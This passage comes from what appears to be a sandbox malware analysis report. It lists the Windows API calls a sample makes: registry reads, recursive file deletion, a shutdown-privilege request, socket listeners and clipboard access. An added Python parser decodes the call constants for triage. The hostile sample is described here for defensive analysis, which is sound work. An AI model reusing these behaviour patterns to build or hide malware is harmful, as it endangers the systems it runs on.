                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: d0c1dcbb8309051bfb53424747db90d3b62d3200e8bd243b5527b147cb2c7b90
                                                  • Instruction ID: d8f4a6f09167051afab637e4473c371a8609309f571a6e6e8f52dbb5ac012ead
                                                  • Opcode Fuzzy Hash: d0c1dcbb8309051bfb53424747db90d3b62d3200e8bd243b5527b147cb2c7b90
                                                  • Instruction Fuzzy Hash: D251093890478829FB34DBA088547EEBFB49F01381F18459DCDD2965C3DAA49BCCC76A
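The function blocks above are easier to triage once the raw call lines are turned into records and the numeric arguments are named: the `DeviceIoControl` call near the top of this section passes control code `000900A4`, the keyboard block polls virtual-key codes `A0`, `A1`, `11`, `12` and `5B`, and the socket block further down passes `2,1,6`. The parser below is an added example written for this report; it is not part of Joe Sandbox or of the sample. It assumes the `Func.MODULE(args), ref: ADDR` line format shown on this page (the sample lines are copied from it), and decodes the constants with the standard Windows definitions: `CTL_CODE` packs device type, function number, method and access into one DWORD, so `0x900A4` is device type 9 (`FILE_DEVICE_FILE_SYSTEM`), function 41, `METHOD_BUFFERED`, which is `FSCTL_SET_REPARSE_POINT`. Together with the `\??\%s` string in the same block, that is a reparse-point (junction) creation routine, and the keyboard block touches only modifier keys.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

# Constructed sample input: call lines in the format of the function listing on
# this page, copied from the report. The parser assumes exactly this format.
SAMPLE_LINES = """
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C5A323
• CloseHandle.KERNEL32(00000000), ref: 00C5A32E
  • Part of subcall function 00C487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
• _memset.LIBCMT ref: 00C47D28
• GetAsyncKeyState.USER32(000000A0), ref: 00C50122
• GetKeyState.USER32(000000A0), ref: 00C50139
• GetAsyncKeyState.USER32(0000005B), ref: 00C50213
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C662DC
• listen.WSOCK32(00000000,00000005), ref: 00C66316
""".strip().splitlines()

# "Func.MODULE(args), ref: ADDR"; the bullet, the subcall prefix and the
# argument list are all optional (compare "_memset.LIBCMT ref: ...").
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>[^\s(]+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

Arg = Union[int, str, None]


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Arg]
    ref: str
    subcall: Optional[str] = None  # address of the callee when "Part of subcall"


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok in ("", "?"):
        return None                 # unresolved by the sandbox
    try:
        return int(tok, 16)         # hex DWORD, possibly negative
    except ValueError:
        return tok                  # string literal such as *.*


def parse_calls(lines: List[str]) -> List[ApiCall]:
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("func"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


# Standard Windows constants (winioctl.h, winuser.h, winsock.h).
IOCTL_NAMES = {0x900A4: "FSCTL_SET_REPARSE_POINT",
               0x900A8: "FSCTL_GET_REPARSE_POINT",
               0x900AC: "FSCTL_DELETE_REPARSE_POINT"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def decode_ctl_code(code: int) -> Dict[str, object]:
    """Split a CTL_CODE DWORD into its fields and name it if known."""
    return {"device_type": code >> 16, "function": (code >> 2) & 0xFFF,
            "method": METHODS[code & 3], "access": (code >> 14) & 3,
            "name": IOCTL_NAMES.get(code)}


def annotate(call: ApiCall) -> Optional[str]:
    """Name the interesting numeric argument of a call, or None."""
    a = call.args
    if call.func == "DeviceIoControl" and len(a) > 1 and isinstance(a[1], int):
        d = decode_ctl_code(a[1])
        return f"{d['name'] or 'IOCTL_0x%X' % a[1]} (device_type={d['device_type']}, " \
               f"function={d['function']}, {d['method']})"
    if call.func in ("GetAsyncKeyState", "GetKeyState") and a and isinstance(a[0], int):
        return VK_NAMES.get(a[0], "VK_0x%02X" % a[0])
    if call.func == "socket" and len(a) >= 3 and all(isinstance(x, int) for x in a[:3]):
        return "/".join((AF.get(a[0], str(a[0])), SOCK_TYPE.get(a[1], str(a[1])),
                         PROTO.get(a[2], str(a[2]))))
    if call.func == "listen" and len(a) > 1 and isinstance(a[1], int):
        return f"backlog={a[1]}"
    return None


def summarize(lines: List[str]) -> Dict[str, List[str]]:
    """Collect the named constants by category for a quick triage view."""
    out: Dict[str, List[str]] = {"ioctls": [], "keys_polled": [], "sockets": []}
    keys = set()
    for c in parse_calls(lines):
        note = annotate(c)
        if note is None:
            continue
        if c.func == "DeviceIoControl":
            out["ioctls"].append(note.split(" ")[0])
        elif c.func in ("GetAsyncKeyState", "GetKeyState"):
            keys.add(note)
        elif c.func == "socket":
            out["sockets"].append(note)
    out["keys_polled"] = sorted(keys)
    return out


if __name__ == "__main__":
    for c in parse_calls(SAMPLE_LINES):
        print(f"{c.ref}  {c.func}.{c.module}  {annotate(c) or ''}")
    print(summarize(SAMPLE_LINES))
```

Run it over the whole "APIs" section of a report rather than the sample to get one summary per function block; the `keys_polled` list makes it obvious when a block checks only Shift, Ctrl, Alt and Win state, as here, versus scanning the full key range.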
                                                  APIs
                                                    • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C704AC
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C7054B
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C705E3
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C70822
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C7082F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: e30611a6a5abab3d1275277f0333bf39c80515b80d883bfcbe957da0ea66b803
                                                  • Instruction ID: 7a5dd97209dacc482c2b2215d3ea07258577655e91b9fc3fa46f2ee95e9b9c8a
                                                  • Opcode Fuzzy Hash: e30611a6a5abab3d1275277f0333bf39c80515b80d883bfcbe957da0ea66b803
                                                  • Instruction Fuzzy Hash: A1E15D31204204EFCB14DF29C891E2ABBE4FF89354F14C56DF95ADB2A1DA30E945CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: a3416a3d2bfabf955891d8830fcc420965c515edd86f5651595120cc24bf0bcf
                                                  • Instruction ID: 9d62c327f92f36151d6c8cefd982a9fb8ff5661684d0530df8612f6e2757d4b2
                                                  • Opcode Fuzzy Hash: a3416a3d2bfabf955891d8830fcc420965c515edd86f5651595120cc24bf0bcf
                                                  • Instruction Fuzzy Hash: 1721C1752002149FDB14AF24EC99B6E7BA8FF05750F10802AF94ADB2B1DB30AD82CF55
                                                  APIs
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                    • Part of subcall function 00C54A31: GetFileAttributesW.KERNEL32(?,00C5370B), ref: 00C54A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C538A3
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C5394B
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C5395E
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C5397B
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5399D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C539B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 2d2f4a620b7fa654c33f65322ecaf59da74894b9a09719b3d7ffe7e262484d06
                                                  • Instruction ID: 167ab1a4dc75ccb0bf0fe881188a2b2b1abcf6f9cf630668b1b6201fd0108421
                                                  • Opcode Fuzzy Hash: 2d2f4a620b7fa654c33f65322ecaf59da74894b9a09719b3d7ffe7e262484d06
                                                  • Instruction Fuzzy Hash: 6C51C27580418CAACF15EBA0CD929FDB7B8AF15341F6040A9E906B7192EF706F4DCB64
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C5F440
                                                  • Sleep.KERNEL32(0000000A), ref: 00C5F470
                                                  • _wcscmp.LIBCMT ref: 00C5F484
                                                  • _wcscmp.LIBCMT ref: 00C5F49F
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00C5F53D
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F553
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: 4885176d8859d1d8901567264dda29f872e1dea99fe258f0243e2cb092e6a51c
                                                  • Instruction ID: 1f13b81015fc4d3365661876683d23d36adb8c0211d7ce32a7d2c37a63d731f1
                                                  • Opcode Fuzzy Hash: 4885176d8859d1d8901567264dda29f872e1dea99fe258f0243e2cb092e6a51c
                                                  • Instruction Fuzzy Hash: 1241907584020E9FCF14DF68CC45AEEBBB4FF05311F5040A9E919A3191EB309A8ADF54
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: db5f1f7658ca22130073de9d07c6e3a4814d2c6afa4f698f391937dea8bb77ec
                                                  • Instruction ID: be32c5adcb14c499c5ccd49aa71ded6a1dedca34c75676ad0e52feb2ebac244a
                                                  • Opcode Fuzzy Hash: db5f1f7658ca22130073de9d07c6e3a4814d2c6afa4f698f391937dea8bb77ec
                                                  • Instruction Fuzzy Hash: D312AA70A00609DFCF04DFA5D981AEEB7F5FF48300F208569E946E7290EB36AA55DB50
                                                  APIs
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                    • Part of subcall function 00C54A31: GetFileAttributesW.KERNEL32(?,00C5370B), ref: 00C54A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C53B89
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C53BD9
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C53BEA
                                                  • FindClose.KERNEL32(00000000), ref: 00C53C01
                                                  • FindClose.KERNEL32(00000000), ref: 00C53C0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: 2f19dce765ce901916e213c609688254be2791b23a8ad9bdd22e4b860981f076
                                                  • Instruction ID: fb38bf3b5cafd896155c10594ef04397bffbfb5e035a8dead8805a6f2f00a6e7
                                                  • Opcode Fuzzy Hash: 2f19dce765ce901916e213c609688254be2791b23a8ad9bdd22e4b860981f076
                                                  • Instruction Fuzzy Hash: C83190350083899BC301EF24C8919BFB7E8AE95305F404E6DF9E597191EF209A4DC767
                                                  APIs
                                                    • Part of subcall function 00C487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
                                                    • Part of subcall function 00C487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C48858
                                                    • Part of subcall function 00C487E1: GetLastError.KERNEL32 ref: 00C48865
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00C551F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 275cc5d1750c983367cef8de307f2b60eed2f74a0a5d476f463e692294757e94
                                                  • Instruction ID: 2401bfcba5ad9b729a1021d3e76ffb18d5490db3975f73c24f93d75f18462bba
                                                  • Opcode Fuzzy Hash: 275cc5d1750c983367cef8de307f2b60eed2f74a0a5d476f463e692294757e94
                                                  • Instruction Fuzzy Hash: 6F012B397916116BF72C62699CBAFBF7258EB05343F200425FD27E20D2D9511DC98798
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C662DC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C662EB
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C66307
                                                  • listen.WSOCK32(00000000,00000005), ref: 00C66316
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C66330
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C66344
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: d84b0512515f8039ed49e36cbfbf66a8c6b1009c952111ec3e2f12a7f31bbe22
                                                  • Instruction ID: 851c890c286f380cefe6a454a29cf53fdd0b682ce8794ddb7249a37c131fd856
                                                  • Opcode Fuzzy Hash: d84b0512515f8039ed49e36cbfbf66a8c6b1009c952111ec3e2f12a7f31bbe22
                                                  • Instruction Fuzzy Hash: 2721A0316002049FCB10EF64C889B7EB7E9EF49720F148569E96AA73E1C770AD46CB51
                                                  APIs
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                  • _memmove.LIBCMT ref: 00C40258
                                                  • _memmove.LIBCMT ref: 00C4036D
                                                  • _memmove.LIBCMT ref: 00C40414
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: 3605ddf99f2487977b8c7bf119ab64bc6092b6caf4427e80dc3ff670b606648e
                                                  • Instruction ID: e8daf732b367a7e48cdd42a4226322da54b4025b2aaa55d46a9220160d70f39d
                                                  • Opcode Fuzzy Hash: 3605ddf99f2487977b8c7bf119ab64bc6092b6caf4427e80dc3ff670b606648e
                                                  • Instruction Fuzzy Hash: 6502DF70A00209DBCF04DF65D981ABEBBF5FF49300F2080A9E906DB295EB71DA54DB91
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BF19FA
                                                  • GetSysColor.USER32(0000000F), ref: 00BF1A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00BF1A61
                                                    • Part of subcall function 00BF1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BF12D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: d3023e19b568f3cff3497d39d78f57680597f02b467fc35ba99c5760a862569d
                                                  • Instruction ID: cf83355f87c3b8c7ef633715781ff0d0bfd797568e67c60546fe009058d6b8b4
                                                  • Opcode Fuzzy Hash: d3023e19b568f3cff3497d39d78f57680597f02b467fc35ba99c5760a862569d
                                                  • Instruction Fuzzy Hash: A8A1467011255CFAE628AB2D9CC4F7F36ECDB42341F144E99F732D3592CA219E45A2B2
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C5BCE6
                                                  • _wcscmp.LIBCMT ref: 00C5BD16
                                                  • _wcscmp.LIBCMT ref: 00C5BD2B
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C5BD3C
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C5BD6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: 8629f1efeafcf5f8d011c8553a8b15925a0cd7de7c3680db5700e6d7d86a4166
                                                  • Instruction ID: 7f62f1a1b6d31ee3aef6b8cc5994b52fd961ad861c35253156f64dfb2da96050
                                                  • Opcode Fuzzy Hash: 8629f1efeafcf5f8d011c8553a8b15925a0cd7de7c3680db5700e6d7d86a4166
                                                  • Instruction Fuzzy Hash: 70517C396046069FC714DF28C491EAAB7F4EF4A320F10455DEA6A873A1DB30ED89CB95
                                                  APIs
                                                    • Part of subcall function 00C67D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C67DB6
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C6679E
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C667C7
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C66800
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C6680D
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C66821
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 61c9ba8b5e7841e17d8fbd08c41e9962431f21d80b624558926f545fb8c59c69
                                                  • Instruction ID: 23cebe57e661f6cc01aeb7725e6ad5d0c356fc789b3f441ec2c6e6755e5ac5ed
                                                  • Opcode Fuzzy Hash: 61c9ba8b5e7841e17d8fbd08c41e9962431f21d80b624558926f545fb8c59c69
                                                  • Instruction Fuzzy Hash: 5341A475A00214AFDB10AF64CC86F7E77E8DF45754F0485ACFA19AB3D2CA709D058B91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: dd9fd9e3a768db7aa142b6cd34c28a193eae7ce10e9c3c6150a5e18e9e3a4930
